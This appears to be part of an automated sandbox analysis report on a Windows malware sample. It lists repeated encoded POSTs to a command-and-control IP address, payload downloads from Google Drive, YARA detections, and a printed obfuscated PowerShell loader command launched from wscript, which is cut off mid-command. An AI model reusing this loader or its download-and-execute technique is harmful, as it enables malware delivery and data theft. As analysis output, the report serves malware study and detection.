              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1NuRs33pJXEZqHl9cIafOpya6u7I1vPKV HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1NuRs33pJXEZqHl9cIafOpya6u7I1vPKV&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1w6J0xEPtolIyRbLIjhnxbM_QNNOpTZFW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1w6J0xEPtolIyRbLIjhnxbM_QNNOpTZFW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: drive.google.com
              Source: unknownHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 180Connection: close
              Source: wab.exe, 00000009.00000002.3336499423.00000000054C0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2559983367.00000000054C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://24.199.107.111/index.php/927339792
              Source: wab.exe, 00000009.00000003.2559983367.00000000054C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://24.199.107.111/index.php/927339792r
              Source: powershell.exe, 00000005.00000002.2536676585.0000000007ACA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microv
              Source: wscript.exe, 00000001.00000002.2070838707.000002293C000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000001.00000003.2041007560.000002293C08B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2041418197.000002293C0B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?daccf7ef1ada1
              Source: wscript.exe, 00000001.00000003.2069109957.0000022939F3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2070611332.0000022939FF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2069820725.0000022939FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cablugtbil.OcX
              Source: wscript.exe, 00000001.00000003.2069109957.0000022939F3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2070611332.0000022939FF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2069820725.0000022939FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/eni
              Source: wscript.exe, 00000001.00000003.2041129175.000002293C040000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2041244405.000002293C067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?daccf7ef1a
              Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC6DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: powershell.exe, 00000002.00000002.2698898787.000001A0DA98C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2532896490.0000000006173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000005.00000002.2528075391.0000000005269000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2611397020.000001A0CA921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2528075391.0000000005111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.2528075391.0000000005269000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.2611397020.000001A0CA921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.2528075391.0000000005111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498305991.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498442967.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000005.00000002.2532896490.0000000006173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.2532896490.0000000006173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.2532896490.0000000006173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.2611397020.000001A0CAB49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC1E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: wab.exe, 00000009.00000002.3336499423.0000000005448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: wab.exe, 00000009.00000002.3336499423.0000000005448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/4
              Source: powershell.exe, 00000002.00000002.2611397020.000001A0CAB49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1NuRs33pJXEZqHl9cIafOpya6u7I1vPKVP
              Source: powershell.exe, 00000005.00000002.2528075391.0000000005269000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1NuRs33pJXEZqHl9cIafOpya6u7I1vPKVXR6lT
              Source: wab.exe, 00000009.00000002.3336499423.0000000005480000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3347616768.0000000020550000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1w6J0xEPtolIyRbLIjhnxbM_QNNOpTZFW
              Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: wab.exe, 00000009.00000002.3336499423.00000000054C0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2523247767.00000000054BF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2559983367.00000000054C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1NuRs33pJXEZqHl9cIafOpya6u7I1vPKV&export=download
              Source: wab.exe, 00000009.00000002.3336499423.0000000005480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w6J0xEPtolIyRbLIjhnxbM_QNNOpTZFW&export=download
              Source: powershell.exe, 00000005.00000002.2528075391.0000000005269000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2611397020.000001A0CBD7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2698898787.000001A0DA98C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2532896490.0000000006173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498305991.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498442967.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498305991.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498442967.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498305991.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498442967.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498305991.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498442967.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498305991.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498442967.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownHTTPS traffic detected: 173.194.219.138:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.194.219.138:443 -> 192.168.2.5:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.5:49716 version: TLS 1.2

              System Summary

              barindex
              Source: amsi32_2228.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2228, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8444
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 8444
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8444Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 8444Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus 